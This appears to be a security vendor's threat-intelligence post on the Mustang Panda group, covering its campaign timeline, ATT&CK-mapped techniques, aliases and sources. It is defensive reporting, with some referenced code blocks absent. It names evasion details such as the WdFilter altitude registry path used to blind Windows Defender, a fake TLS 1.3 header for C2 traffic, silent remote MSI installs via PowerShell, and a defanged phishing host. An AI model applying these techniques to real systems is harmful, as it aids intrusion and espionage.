Mustang Panda (TA416) Group: LOTUSLITE, SnakeDisk, and ToneShellws Endpoint Campaign

Since emerging in 2012 and gaining notoriety in 2017 for targeting a U.S. think tank, Mustang Panda has maintained an aggressive operational tempo. Their espionage footprint has expanded significantly to include attacks on the Vatican, telecommunications firms, and European diplomatic entities during the invasion of Ukraine. This strategic agility was further demonstrated through sustained campaigns against government bodies in the Philippines, Slovakia, and attendees of the 2024 ASEAN-Australia Summit. Even after a significant international law enforcement operation in early 2025 neutralized their widespread PlugX infrastructure, the group quickly retooled later that year with the localized SnakeDisk USB worm and the LOTUSLITE backdoor to renew attacks against U.S. policy organizations in 2026.

The group employs a diverse set of tactics, techniques, and procedures, often initiating infections via spearphishing emails containing malicious attachments or links, as well as through USB propagation using the SnakeDisk worm. To maintain persistence and evade detection, they utilize DLL side-loading with legitimate binaries, modify registry keys for startup execution, and employ kernel-mode rootkits to hide artifacts. Their toolkit includes custom malware like LOTUSLITE and ToneShell, which leverage command-and-control infrastructure often masked by legitimate services like Cloudflare or masqueraded as benign web traffic. Furthermore, Mustang Panda demonstrates sophistication by using geofencing to restrict payload delivery to specific targets and employing native APIs or PowerShell to execute commands while bypassing security controls such as Windows Defender.

In this post, we will review Mustang Panda's major historical operations, detail its significant intrusions against global government and diplomatic entities, and dissect the group's most remarkable tactics, techniques, and procedures to reveal how it executes persistent cyberespionage campaigns. In the end, we will show how Picus Platform helps defend against this group.

Simulate APT Attacks with 14-Day Free Trial of Picus Platform

What Are the Major Activities of the Mustang Panda Group?

2012 – The group is assessed to have commenced operations [1].

April  2017 – A U.S.‑based think tank was targeted, leading to the first observation of the group and the identification of its unique tactics, techniques, and procedures [2].

May  2020 – The Vatican and the Catholic Diocese of Hong Kong were targeted prior to the renewal of a provisional agreement between the Vatican and China [3].

March  2021 – Telecommunication companies were targeted in a cyberespionage campaign dubbed "Operation Diànxùn" [4].

September  2021 – Malware samples utilizing the ToneShell backdoor and ToneIns downloader were first detected [5].

February–March  2022 – European diplomatic entities were targeted with lures related to the invasion of Ukraine, marking a shift in focus from Southeast Asian targets [6].

July  2022 – A second variant of ToneShell was observed in a global campaign targeting critical organizations, including those in Myanmar [5].

August  2023 – Government organizations in the Philippines and Slovakia were targeted in separate cyberespionage campaigns [4].

March  2024 – Malware packages were deployed against organizations in Myanmar, the Philippines, Japan, and Singapore, coinciding with the ASEAN‑Australia Special Summit [7].

14 January  2025 – An international law enforcement operation was announced that removed PlugX malware from over 4,000 infected computers in the United States [8].

Mid‑August 2025 – The SnakeDisk USB worm was discovered, engineered to execute exclusively on devices with Thailand-based IP addresses and subsequently drop the Yokai backdoor [9].

January  2026 – U.S. government and policy organizations were targeted with the LOTUSLITE backdoor using Venezuela‑themed spear phishing emails [10].

Which MITRE ATT&CK Techniques Are Used by Mustang Panda?

Tactic: Resource Development

T1583.001 Acquire Infrastructure: Domains

It was observed that Mustang Panda registered command-and-control (C2) servers for a campaign using NameCheap services [11].

T1587.001 Develop Capabilities: Malware

The threat actor employed a custom C++ backdoor tracked as LOTUSLITE. This implant is capable of communicating with a hard-coded IP-based command-and-control server and executing remote tasks [12].

T1587.003 Develop Capabilities: Digital Certificates

To bypass security controls, the group utilized a stolen or leaked digital certificate to sign their malicious driver. The certificate was issued to "Guangzhou Kingteller Technology Co., Ltd." and was valid between August 2012 and August 2015 [11].

Tactic: Initial Access

T1091 Replication Through Removable Media

Mustang Panda deployed a USB worm, identified as SnakeDisk, which detects and weaponizes USB devices to propagate. The worm copies itself to the drive and tricks users into executing it [9].

T1566.001 Phishing: Spearphishing Attachment

Mustang Panda initiated an infection chain via a targeted spear-phishing campaign. This involved the distribution of a politically themed ZIP archive, named "US now deciding what's next for Venezuela.zip", containing a legitimate executable and a malicious DLL [12].

T1566.002 Phishing: Spearphishing Link

The group used spearphishing emails containing links to remotely hosted HTML files. These files were often hosted on legitimate services like Microsoft Azure (e.g., https[:]//cdn7s65[.]z13[.]web[.]core[.]windows[.]net) to initiate the infection chain [13].

Tactic: Execution

T1059.001 Command and Scripting Interpreter: PowerShell

Malicious LNK and MSC files executed PowerShell commands to retrieve and install remotely hosted Windows Installer (MSI) files. The commands often used the InstallProduct method and flags like REMOVE=ALL.

(Source: Recorded Future [13])

Above payload launches a hidden PowerShell instance and creates a "Windows Installer" object, which allows scripts to control software installation programmatically. By setting the UILevel to 2 (Silent), it suppresses all installation wizards and pop-ups, ensuring the user sees nothing on their screen. Then, it forces the Windows Installer to fetch a remote MSI package from the specified URL.

T1106 Native API

Mustang Panda extensively utilizes Native APIs for different purposes, such as registering callbacks [11].

Tactic: Persistence

T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

To ensure LOTUSLITE malware survives system reboots, Mustang Panda modifies the Windows Registry. The malware uses the SHSetValueA API to add an entry to the current user's Run key [12].

Tactic: Defense Evasion

T1014 Rootkit

A kernel-mode rootkit is employed to hide the actor's activities. The rootkit protects its own module, the injected user-mode processes, and specific registry keys from being accessed or removed by security tools. The protected registry keys and the registry operations that are monitored by the rootkit are shown below:

By keeping watch over four distinct registry operations, the callback effectively blocks any attempt to access keys on its protected list by issuing the 0xC0000022 (STATUS_ACCESS_DENIED) error code [11].

T1027.007 Obfuscated Files or Information: Dynamic API Resolution

A malicious driver used by the group obfuscates its behavior by dynamically resolving API addresses using a hashing algorithm rather than static imports. The hashing algorithm identified is:

(Source: Securelist [11])

T1036.005 Masquerading: Match Legitimate Resource Name or Location

The threat actor disguised the malicious network traffic to appear benign. Command-and-control traffic was crafted to mimic legitimate web activity by using specific HTTP headers, including a Googlebot User-Agent and a Microsoft Host header [12].

T1036.007 Masquerading: Double File Extension

LNK files were disguised using double extensions (e.g., doc.lnk) and manipulated icons [13] (e.g., Microsoft Word icon) to trick users into believing they were opening benign documents.

T1112 Modify Registry

The group searches the registry to identify the configuration of WdFilter in order to modify its altitude [11]. WdFilter.sys (officially the Microsoft Defender Antivirus Mini-Filter Driver) is the specific filter driver used by Windows Defender to protect the computer in real-time. The altitude value for WdFilter is stored in the HKLM\SYSTEM\CurrentControlSet\Services\WdFilter\Instances\WdFilter Instance registry key. Modifying this value alters the driver's position in the I/O stack (or prevents it from loading entirely). This allows threat actors to write malicious content to disk without detection.

T1480 Execution Guardrails

Mustang Panda utilized Cloudflare's geofencing capabilities to restrict access to the next stage of the infection chain. The download of the malicious payload was permitted only if the victim's IP address originated from specific target countries, such as Myanmar, Vietnam, or Cambodia [13].

T1564.001 Hide Artifacts: Hidden Files and Directories

Mustang Panda attempted to conceal the malicious payload within the directory. A malicious DLL file, kugou.dll, was set with hidden file attributes to prevent immediate detection by the user [12].

Also, the group used SnakeDisk malware, which hides the victim's legitimate files in a concealed directory. It then places a malicious executable in the root directory and renames it to match the USB volume label (or sets it to 'USB.exe'). This tricks the user into double-clicking the malware, thinking they are opening the drive or a folder [9].

T1574.001 Hijack Execution Flow: DLL

In a campaign, Mustang Panda relied on DLL side-loading to execute malicious code. The actor utilized a legitimate, signed executable (originally a launcher for the KuGou music streaming service) to load the malicious kugou.dll file located in the same directory [12].

Tactic: Discovery

T1033 System Owner/User Discovery

LOTUSLITE backdoor utilizes the GetUserNameA function to identify the username of the compromised environment [12].

T1082 System Information Discovery

LOTUSLITE backdoor enumerates the host's machine name using standard Windows API functions like GetComputerNameA [12].

Additionally, the HTML files used in the initial access phase of a campaign enumerated the victim's operating system via the browser's user agent to determine if the target was running Windows before delivering the malicious payload [13].

T1614 System Location Discovery

SnakeDisk confirmed it was executing on a machine in Thailand by querying an external IP geolocation service (ipinfo.io). It checked if the "country" field in the response matched "THA" or "TH" [9].

Tactic: Command and Control

T1001.003 Data Obfuscation: Protocol or Service Impersonation

The ToneShell backdoor disguises its network traffic as TLS 1.3 by prepending a fake header (0x17 0x03 0x04) to the XOR-encrypted payload [11]. This exploits the opacity of the 'Application Data' content type (0x17); because security tools cannot decrypt the payload, they often permit the traffic based solely on the legitimate appearance of the protocol header. This can allow attackers to stealthily maintain Command and Control (C2) flow.

T1071.001 Application Layer Protocol: Web Protocols

The LOTUSLITE backdoor communicates with its command-and-control server using the HTTP protocol. It leverages Windows WinHTTP APIs to establish connections and transmits data via POST requests over TCP port 443 [12].

T1102 Web Service

Mustang Panda consistently used the Cloudflare Content Delivery Network (CDN) to proxy C2 traffic to their backend servers. This allowed the malicious traffic to blend in with legitimate CDN traffic and complicated victim identification [13].

Tactic: Exfiltration

T1041 Exfiltration Over C2 Channel

Mustang Panda configured the LOTUSLITE backdoor to exfiltrate collected data directly through the established command-and-control channel. The implant supports data exfiltration capabilities, transmitting information within the body of the HTTP POST requests [12].

How Picus Simulates Mustang Panda Group Attacks?

We also strongly suggest simulating Mustang Panda Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for the Mustang Panda Group:

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

What Are the Aliases of the Mustang Panda Group?

Mustang Panda is also known as: Bronze President, TEMP.Hex, HoneyMyte, Red Lich, Earth Preta, Camaro Dragon, PKPLUG, Stately Taurus, Twill Typhoon, Hive0154, G0129, TA416, BASIN, BRONZE PRESIDENT, Earth Preta, HoneyMyte, LuminousMoth, Polaris, Red Lich, Stately Taurus, TA416, TANTALUM, TEMP.HEX, Twill Typhoon.

Key Takeaways

• Despite a significant international law enforcement operation in early 2025 that neutralized their PlugX infrastructure, Mustang Panda demonstrated strategic resilience by retooling with the LOTUSLITE backdoor and SnakeDisk USB worm to target U.S. policy organizations in 2026.
• The group maintains an aggressive operational tempo targeting global government and diplomatic entities, with campaigns expanding from U.S. think tanks to the Vatican, European diplomatic bodies during the invasion of Ukraine, and attendees of the 2024 ASEAN-Australia Summit.
• Mustang Panda employs a diverse set of initial access vectors, primarily utilizing spearphishing emails with malicious attachments or links hosted on legitimate services like Azure, as well as physical propagation through the SnakeDisk USB worm.
• To evade detection and maintain persistence, the group utilizes sophisticated techniques such as DLL side-loading with legitimate binaries, kernel-mode rootkits to hide registry artifacts, and geofencing to restrict payload delivery to specific targets.
• Command-and-control communications are frequently masked to blend in with benign traffic, utilizing tactics like disguising ToneShell traffic as TLS 1.3 packets or employing Googlebot User-Agents and Microsoft Host headers to mimic legitimate web activity.
• The group extensively leverages Native APIs and PowerShell commands to execute tasks while bypassing security controls, including the use of rootkits to monitor specific registry operations and block access to protected keys.

References

[1] “Mustang Panda.” Accessed: Jan. 20, 2026. [Online]. Available: https://attack.mitre.org/groups/G0129/

[2] A. Meyers, “Mustang Panda,” CrowdStrike.com. Accessed: Jan. 20, 2026. [Online]. Available: https://www.crowdstrike.com/en-us/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/

[3] “Threat Group Cards: A Threat Actor Encyclopedia.” Accessed: Jan. 20, 2026. [Online]. Available: https://apt.etda.or.th/cgi-bin/showcard.cgi?g=RedDelta&n=1

[4] “Threat Group Cards: A Threat Actor Encyclopedia.” Accessed: Jan. 20, 2026. [Online]. Available: https://apt.etda.or.th/cgi-bin/showcard.cgi?g=Mustang%20Panda%2C%20Bronze%20President

[5] V. T. Intelligence, “ToneShell - APT Mustang Panda’s new weapon,” Viettel Cyber Security. Accessed: Jan. 20, 2026. [Online]. Available: https://viettelsecurity.com/toneshell-apt-mustang-pandas-new-weapon/

[6] S. Huntley, “An update on the threat landscape,” Google. Accessed: Jan. 20, 2026. [Online]. Available: https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/

[7] Accessed: Jan. 20, 2026. [Online]. Available: https://www.imda.gov.sg/-/media/imda/files/regulations-and-licensing/regulations/advisories/infocomm-media-cyber-security/chinese-apt-groups-target-asean-entities.pdf

[8] “Justice Department and FBI Conduct International Operation to Delete Malware Used by China-Backed Hackers.” Accessed: Jan. 20, 2026. [Online]. Available: https://www.justice.gov/archives/opa/pr/justice-department-and-fbi-conduct-international-operation-delete-malware-used-china-backed

[9] G. Mühr and J. Chung, “Hive0154, aka Mustang Panda, drops updated Toneshell backdoor and novel SnakeDisk USB worm.” Accessed: Jan. 20, 2026. [Online]. Available: https://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor

[10] The Hacker News, “LOTUSLITE Backdoor Targets U.S. Policy Entities Using Venezuela-Themed Spear Phishing,” The Hacker News. Accessed: Jan. 20, 2026. [Online]. Available: https://thehackernews.com/2026/01/lotuslite-backdoor-targets-us-policy.html

[11] N. Shabab, “The HoneyMyte APT evolves with a kernel-mode rootkit and a ToneShell backdoor,” Kaspersky. Accessed: Jan. 20, 2026. [Online]. Available: https://securelist.com/honeymyte-kernel-mode-rootkit/118590/

[12] Acronis Threat Research Unit, “LOTUSLITE: Targeted espionage leveraging geopolitical themes,” Acronis. Accessed: Jan. 20, 2026. [Online]. Available: https://www.acronis.com/en/tru/posts/lotuslite-targeted-espionage-leveraging-geopolitical-themes/

[13] Insikt Group®, “Chinese State-Sponsored RedDelta Targeted Taiwan, Mongolia, and Southeast Asia with Adapted PlugX Infection Chain.” Accessed: Jan. 21, 2026. [Online]. Available: https://www.recordedfuture.com/research/reddelta-chinese-state-sponsored-group-targets-mongolia-taiwan-southeast-asia